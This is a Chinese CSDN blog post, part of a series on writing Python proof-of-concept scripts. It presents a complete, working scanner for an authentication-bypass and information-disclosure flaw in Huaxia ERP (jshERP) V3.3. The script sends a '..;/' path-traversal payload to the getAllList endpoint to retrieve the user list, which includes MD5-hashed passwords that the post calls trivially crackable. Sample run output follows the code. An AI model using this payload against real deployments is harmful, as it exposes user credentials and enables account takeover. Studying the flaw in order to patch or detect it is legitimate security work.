Python-Poc编写(5)

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量301 收藏 3
点赞数 2
分类专栏: python-poc编写 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53884648/article/details/141392684
版权

一、背景

此次编写的是圈子中分享的华夏ERP信息泄露(userList)漏洞;测试该漏洞目前还是存在的;经过挖掘发现该ERP使用的用户密码加密方式是属于MD5加密;这是一种容易被攻击这撞库的加密方式可以说和明文传输没有区别。

二、POC编写

import argparse
import requests
import sys


# 创建poc模块接收参数
def cmd(url):
    # 创建payliad
    payload = "/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList"
    url1 = f"{url}{payload}"
    try:
        response = requests.get(url1, verify=False, timeout=3)  # 发送get请求,超时3秒
        if response.status_code == 200 and "userList" in response.text:
            print( f"【+】{url}存在该漏洞\n")
        else:
            print( f"【-】{url}不存在该漏洞\n")
    except Exception as e:
        print( f"【*】{url}存在异常;请检测!!\n")


def main():
    # 字符画
    banner = """
  _____        _          _____            _    
 |  __ \      | |        |  __ \          | |   
 | |  | | __ _| |_ __ _  | |__) |__ _  ___| | __
 | |  | |/ _` | __/ _` | |  _  // _` |/ __| |/ /
 | |__| | (_| | || (_| | | | \ \ (_| | (__|   < 
 |_____/ \__,_|\__\__,_| |_|  \_\__,_|\___|_|\_\

作者:添衣&吹風  地址:https://blog.csdn.net/weixin_53884648

        """
    print(banner)
    print("华夏ERP-V3.3")
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", dest="url", required=True, default=None, help="请输入url地址")
    args = parser.parse_args()
    cmd(args.url)


if __name__ == '__main__':
    main()

三、使用

python 华夏ERP.py -u http://x.x.x.x

  _____        _          _____            _
 |  __ \      | |        |  __ \          | |
 | |  | | __ _| |_ __ _  | |__) |__ _  ___| | __
 | |  | |/ _` | __/ _` | |  _  // _` |/ __| |/ /
 | |__| | (_| | || (_| | | | \ \ (_| | (__|   <
 |_____/ \__,_|\__\__,_| |_|  \_\__,_|\___|_|\_
作者:添衣&吹風  地址:https://blog.csdn.net/weixin_53884648


华夏ERP-V3.3
【+】http://x.x.x.x存在该漏洞

添衣&吹風
关注
专栏目录
华夏ERP信息泄露漏漏洞复现 [附POC]
薛定谔嘚喵博客
11-27 361
该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息。
python-poc:该存储库包含python的基本演示代码
03-07
10. **Jupyter Notebook**:这是一种交互式开发环境,适合编写和展示Python代码,特别适合数据分析和教学。 "python-poc-master"这个压缩包可能包含了上述各个方面的基础示例代码,例如简单的变量赋值、数据类型...
华夏ERP getAllList;.ico敏感信息泄露漏洞
Keepb1ue的博客
12-22 842
华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。将password的值进行md5解密为明文,即可登录。对相关接口进行限制访问、鉴权。
华夏ERPV3.3存在信息泄漏漏洞
网安小白
08-20 459
1 前言免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
「Java代码审计」华夏ERP3.0代码审计
橙留香Park的博客
09-22 3608
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ..
Some-PoC-oR-ExP:各种漏洞poc、Exp的收集或编写
04-28
Python作为标签,意味着大部分的PoC和Exp可能使用Python语言编写Python因其简洁明了的语法和丰富的库支持,成为了安全研究者常用的工具。例如,它可以用来构造HTTP请求,模拟用户交互,甚至创建复杂的内存操作,...
Python-PoC代码用于从Windows10内置的sshagent服务中提取私钥
08-12
PoC(Proof of Concept)代码是针对这个潜在的安全问题设计的,目的是演示如何利用Python从Windows 10的ssh-agent服务中提取私钥。这涉及到Python编程语言的使用,特别是与SSH相关的库,如`paramiko`或`win32...
R-poc
03-27
5. **网络爬虫**:Python的 `requests` 和 `BeautifulSoup` 等库可用于编写爬虫,收集目标网站的数据,帮助进行情报收集。 6. **漏洞利用**:R-poc 可能包含了对已知漏洞的概念验证代码,比如SQL注入、跨站脚本...
Sample-ML-POC
03-25
综上所述,"Sample-ML-POC"项目可能是围绕Python进行的一个事件预测实践,涵盖了数据预处理、特征选择、模型训练、评估和优化等机器学习核心环节。压缩包中的"Sample-ML-POC-main"可能包含了项目的主代码文件、数据...
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 695
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 606
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1405
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 352
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 462
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统的安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发?
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1131
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
安卓开发中,可以反射去换肤,那么我们应该也可以使用反射去串改我们的程序,作为开发者,我们如何保证我们自己的应用的安全呢?
qq_43664361的博客
09-22 545
在安卓开发中,虽然反射提供了强大的动态操作能力,包括访问和修改类、接口、字段以及方法,但这也为潜在的恶意攻击者提供了篡改程序的可能性。作为开发者,我们需要采取一系列措施来确保自己应用的安全,防止反射被用于非法目的。
数据库的全透明加密和半透明加密主要是针对数据存储安全的不同处理方式
weixin_45699851的博客
09-25 315
对于应用程序来说,它处理的是密文,而加密过程和解密过程都是由数据库系统在后台自动完成的。这种模式下,开发者几乎察觉不到加密的存在,查询和操作的速度不会受到影响,因为大部分加密操作都在内存中快速完成。当数据被插入到数据库时,它会被加密,但对于读取数据的应用程序来说,它仍然能看到明文结果。这意味着应用程序需要知道如何处理加密后的数据,比如查询前先解密,然后对解密后的数据进行操作,再加密返回给客户端。这种方式牺牲了一些便利性,但可以提供更好的性能,因为它不需要每次查询都做完整的加密解密处理。
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 1026
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
了解云计算工作负载保护的重要性,确保数据和应用程序安全
m0_74885516的博客
09-25 545
随着威胁的演变和环境的日益复杂,保护云工作负载变得至关重要。在这里了解有效的云计算工作负载保护(CWP)。云计算技术的快速发展使得数据和应用程序的安全性成为一项重要的需求
python编写poc脚本
10-11
编写 Python POC(Proof of Concept)脚本时,您需要先确定攻击目标和漏洞类型。然后,您可以使用适当的库和模块来构建脚本。以下是一个示例脚本,用于检测目标是否存在一个简单的HTTP服务,并输出其响应状态码: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值